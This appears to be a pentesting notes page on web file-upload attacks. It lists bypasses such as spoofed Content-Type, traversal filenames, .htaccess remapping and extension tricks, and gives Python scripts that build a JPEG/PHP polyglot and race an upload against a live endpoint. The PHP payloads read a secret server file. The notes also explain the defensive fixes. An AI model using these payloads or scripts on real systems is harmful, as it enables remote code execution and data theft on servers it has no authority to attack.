Pentesting and Red Teaming Notes
File upload Attacks

  • Maybe the application does not validate the file extension at all and lets you upload .php, .js, .py or .jsp files outright? Always try the obvious case first.

  • Is the application validating the file type only from the Content-Type header of the multipart part? That header is supplied by the client: upload the part with filename="shell.php" but set Content-Type: image/png and the check passes.

  • The application might be configured to deny script execution in the upload directory, but if the server builds the destination path from the client-supplied filename, a path traversal sequence in the filename writes the file somewhere else, e.g.:

Content-Disposition: form-data; name="avatar"; filename="../../resources/images/test.php"
Content-Type: image/png

If the response echoes the stored path back without the traversal, the server may have stripped it; try URL-encoding the slashes (..%2f) as well.
  • If dangerous file extensions such as .php are blacklisted, lesser-known extensions that the same interpreter still handles (.php5, .phtml, .phar, .shtml, etc.) may not be on the list.

Note: Apache only hands a requested .php file to the interpreter if the PHP module is loaded and the extension is mapped to it, which is why the extension matters so much. Typically that is done with these directives in /etc/apache2/apache2.conf (or a conf file it includes):

LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .php
  • Apache servers load directory-specific configuration from .htaccess files. Similarly, IIS servers take directory-specific configuration from a web.config file.

  • If the application only accepts text files, we may be able to override the directory's (or the server's) configuration by uploading a .htaccess file with the following contents:

AddType application/x-httpd-php .meow

This maps the .meow extension to the application/x-httpd-php MIME type, so uploading a PHP shell as shell.meow into the same directory results in code execution. This only works where AllowOverride permits .htaccess to set FileInfo directives for that directory.

  • Maybe the extension check is case sensitive? Upload .PHP or .pHp instead of .php, .JS instead of .js. Apache's extension matching is case-insensitive, so the file is still executed.

  • Maybe upload exploit.php.jpg? Whether this executes depends on how the server maps multiple extensions (Apache's mod_mime evaluates every extension in the name, so a handler registered for .php can still apply) and on the stored name keeping both extensions.

  • Upload a name with trailing characters that the filesystem silently strips, e.g. exploit.php. (trailing dot) or exploit.php followed by a space: the check sees an extension that is not .php, but Windows stores the file as exploit.php.

  • Try URL encoding (or double URL encoding) the dots, forward slashes and backslashes in the filename. If the value is not decoded when the extension is validated but is decoded later server-side, this also lets you upload files that would otherwise be blocked: exploit%2Ephp

  • Try exploit.asp;.jpg (older IIS selects the handler from the part before the semicolon) or exploit.asp%00.jpg (the validation sees .jpg, but a C-backed file API stops at the null byte and stores exploit.asp).

  • If the server strips the dangerous extension instead of rejecting the upload, and does so in a single pass, put the token inside itself so that removing it once produces the real extension: exploit.p.phphp becomes exploit.php, exploit.j.jspsp becomes exploit.jsp.
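To make the list of extension tricks above concrete, here is an added example (not from the original notes) that models the two weak filters these tricks target, a blacklist on the literal last extension and a single-pass strip of the dangerous token, next to an allowlist done properly. The weak_blacklist, weak_strip, name_on_disk and safe_extension functions are constructed for illustration; the Windows, C-runtime and IIS behaviours they model are the ones the bullets above rely on.

```python
import os
import urllib.parse

ALLOWED = {"png", "jpg", "jpeg", "gif"}


def weak_blacklist(filename):
    """Typical weak check: reject only when the literal last extension is '.php'."""
    return os.path.splitext(filename)[1] != ".php"


def weak_strip(filename, token=".php"):
    """Typical weak 'sanitiser': delete the dangerous token once, store whatever is left."""
    return filename.replace(token, "", 1)


def name_on_disk(filename, windows=False, c_runtime=False, iis=False):
    """What actually gets stored/served for a name the weak check accepted."""
    name = urllib.parse.unquote(filename)      # a later decode turns %2E back into '.'
    if c_runtime:
        name = name.split("\x00", 1)[0]        # C string APIs stop at the first NUL
    if iis:
        name = name.split(";", 1)[0]           # old IIS picks the handler from the part before ';'
    if windows:
        name = name.rstrip(". ")               # NTFS drops trailing dots and spaces
    return name


def safe_extension(filename):
    """Allowlist done properly: normalise first, then demand exactly one allowed extension.
    Returns the extension to store under (the server should generate the rest of the name),
    or None to reject."""
    name = urllib.parse.unquote(urllib.parse.unquote(filename))   # decode before checking
    if "\x00" in name or ";" in name:
        return None
    name = name.replace("\\", "/").rsplit("/", 1)[-1]              # drop any traversal path
    name = name.rstrip(". ").lower()                               # what the FS would keep
    parts = name.split(".")
    if len(parts) != 2 or not parts[0] or parts[1] not in ALLOWED:
        return None
    return parts[1]


BYPASSES = [
    "exploit.pHp", "exploit.php.jpg", "exploit.php.", "exploit%2Ephp",
    "exploit.asp%00.jpg", "exploit.asp;.jpg", "exploit.p.phphp",
    "../../resources/images/test.php",
]

if __name__ == "__main__":
    for name in BYPASSES:
        print(f"{name:36} blacklist passes={weak_blacklist(name)!s:5} "
              f"stored as={name_on_disk(name, windows=True, c_runtime=True, iis=True)!r:22} "
              f"allowlist={safe_extension(name)}")
    print("weak_strip:", weak_strip("exploit.p.phphp"), weak_strip("exploit.j.jspsp", ".jsp"))
```

Every name in BYPASSES gets through the blacklist and ends up on disk (or in the handler lookup) as a script, while the allowlist rejects all of them and accepts only names like Avatar.PNG. The real fix is the allowlist plus a server-generated filename; the weak functions are there to show why each trick works.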

  • Instead of trusting the declared content type, more careful servers verify that the file contents match what is expected: magic bytes in the header or footer, image dimensions, and so on. JPEG files, for example, always begin with the bytes FF D8 FF. Such checks only look at the structure, not at the metadata, so with a tool like ExifTool it is trivial to create a polyglot JPEG that carries PHP code in its metadata and still passes as an image:

exiftool -Comment="<?php echo 'START '.file_get_contents('/home/carlos/secret'). 'END'; ?>" meow.jpg -o meow.php

The output is a valid JPEG whose comment segment contains the payload, saved under a .php name so that the server executes it.
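A JPEG/PHP polyglot equivalent to the exiftool command above, as an added example that is not from the original notes: it places the payload in a JPEG COM segment (the segment exiftool's -Comment tag writes), then shows that the magic-byte check passes while the PHP tag is intact in the file. PAYLOAD and the meow.php output name are taken from the bullet; the minimal container is constructed here and carries no frame or scan data, so a full image decoder would reject it even though the header check does not.

```python
import struct

SOI, EOI, COM = b"\xff\xd8", b"\xff\xd9", b"\xff\xfe"


def jpeg_with_comment(comment: bytes) -> bytes:
    """Minimal JPEG container: SOI, one COM segment carrying `comment`, EOI.
    A real photo also has frame and scan segments; a magic-byte check never reads that far."""
    if len(comment) + 2 > 0xFFFF:
        raise ValueError("COM payload exceeds the 16-bit segment length")
    return SOI + COM + struct.pack(">H", len(comment) + 2) + comment + EOI


def looks_like_jpeg(data: bytes) -> bool:
    """The header check described above: JPEG files start with FF D8 FF."""
    return data[:3] == b"\xff\xd8\xff"


def jpeg_comments(data: bytes) -> list:
    """Walk the marker segments and return every COM payload, as an image parser would."""
    found, i = [], 2                                  # skip SOI
    while i + 4 <= len(data) and data[i] == 0xFF:
        marker = data[i + 1]
        if marker == 0xD9:                            # EOI
            break
        length = struct.unpack(">H", data[i + 2:i + 4])[0]   # length includes its own 2 bytes
        if marker == 0xFE:
            found.append(data[i + 4:i + 2 + length])
        i += 2 + length
    return found


def php_executes(data: bytes) -> bool:
    """PHP scans the whole file for an opening tag; bytes outside the tags are echoed
    verbatim, so the JPEG prefix appears in the response before the script output."""
    return b"<?php" in data


PAYLOAD = b"<?php echo 'START '.file_get_contents('/home/carlos/secret').'END'; ?>"

if __name__ == "__main__":
    blob = jpeg_with_comment(PAYLOAD)
    with open("meow.php", "wb") as fh:                # same output name as the exiftool command
        fh.write(blob)
    print(looks_like_jpeg(blob), jpeg_comments(blob) == [PAYLOAD], php_executes(blob))
```

The defensive counterpart is to decode and re-encode every uploaded image on the server (an image library rewrite drops the COM segment along with the rest of the metadata) and to serve uploads from a location where nothing is executed, rather than to extend the magic-byte check.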

  • Maybe the uploaded file is first written to its final, web-accessible path and only then moved to a temporary directory and checked (extension, filename, image dimensions, etc.), with the file deleted if a check fails. For example: the upload lands at /files/avatar/test.png, the server moves it to /tmp/test.png to validate it, and it is either published or removed depending on the result. The window between the initial write and the move is a race condition. Send the upload of shell.php continuously from Intruder while repeatedly issuing GET /files/avatar/shell.php from Repeater (or from a script): sooner or later a GET lands while the file is still in place and the shell executes before the server moves or deletes it.
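The race described above, as an added example that is not part of the original notes. It also builds the raw multipart body used earlier for the spoofed Content-Type and traversal-filename bypasses, so it can be run without Burp. VulnerableTarget and HardenedTarget are constructed stand-ins for the two server designs (write first and validate later, versus validate in quarantine and publish afterwards); http_target applies the same upload/fetch pair to a real endpoint, and its URLs and the avatar field name are assumptions.

```python
import threading
import time
import urllib.error
import urllib.request


def multipart_body(field, filename, content_type, data, boundary="----WebKitFormBoundaryRace"):
    """Raw multipart/form-data body. filename and content_type are sent verbatim, so a
    traversal filename or a spoofed image/png Content-Type goes through unchanged."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n").encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode(), f"multipart/form-data; boundary={boundary}"


class VulnerableTarget:
    """Stand-in for the server described above: the upload lands in the web root first,
    then is moved away and validated. The sleep is the validation window."""
    def __init__(self, window=0.005):
        self.webroot, self.lock, self.window = {}, threading.Lock(), window

    def upload(self, name, data):
        with self.lock:
            self.webroot[name] = data          # file is reachable from here ...
        time.sleep(self.window)                # ... while it is copied to /tmp and checked
        with self.lock:
            self.webroot.pop(name, None)       # checks fail, file removed

    def get(self, name):
        with self.lock:
            return self.webroot.get(name)


class HardenedTarget(VulnerableTarget):
    """Validates a quarantined copy and publishes only what passes the allowlist."""
    def upload(self, name, data):
        quarantine = {name: data}              # never under the web root
        time.sleep(self.window)
        if name.lower().endswith((".png", ".jpg")):
            with self.lock:
                self.webroot[name] = quarantine[name]


def race(upload, fetch, name, data, uploaders=4, fetchers=4, attempts=100):
    """Hammer upload() on some threads while others poll fetch(name).
    Returns the first body retrieved from the web root, or None if the window never opened."""
    hit, stop = [], threading.Event()

    def up():
        for _ in range(attempts):
            if stop.is_set():
                return
            upload(name, data)

    def down():
        while not stop.is_set():
            body = fetch(name)
            if body is not None:
                hit.append(body)
                stop.set()

    ups = [threading.Thread(target=up) for _ in range(uploaders)]
    downs = [threading.Thread(target=down) for _ in range(fetchers)]
    for t in ups + downs:
        t.start()
    for t in ups:
        t.join()
    stop.set()
    for t in downs:
        t.join()
    return hit[0] if hit else None


def http_target(upload_url, base_url, field="avatar"):
    """upload/fetch pair for a live target, e.g. http_target('https://host/my-account/avatar',
    'https://host/files/avatar/'). Assumed URLs; not exercised offline."""
    def upload(name, data):
        body, ctype = multipart_body(field, name, "image/png", data)
        req = urllib.request.Request(upload_url, data=body, headers={"Content-Type": ctype})
        try:
            urllib.request.urlopen(req).close()
        except urllib.error.HTTPError:
            pass                               # rejected, but it was briefly on disk

    def fetch(name):
        try:
            with urllib.request.urlopen(base_url + name) as resp:
                return resp.read()
        except urllib.error.HTTPError:
            return None                        # 404: not there at this instant
    return upload, fetch


SHELL = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"

if __name__ == "__main__":
    v, h = VulnerableTarget(), HardenedTarget()
    print("vulnerable:", race(v.upload, v.get, "shell.php", SHELL))
    print("hardened:  ", race(h.upload, h.get, "shell.php", SHELL))
```

Against the live target, replace the stand-ins with `upload, fetch = http_target(...)` and look for the secret in the returned body rather than the shell source. The fix is the HardenedTarget shape: nothing reaches a served directory until validation has finished, and only under a server-generated name.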

  • If .html or .svg uploads are allowed and are served back from the application's origin, the upload is stored XSS (SVG can carry script and event handlers just like HTML).

  • If the server accepts .xls, .doc, .xlsx or .docx files, remember that the Office formats are XML based (the x formats are zip archives of XML documents), so a parser on the server side may be reachable for XXE.

  • Maybe files can be uploaded with the HTTP PUT method directly to a path of your choosing? Send an OPTIONS request to see which methods the server advertises.


Last updated 1 year ago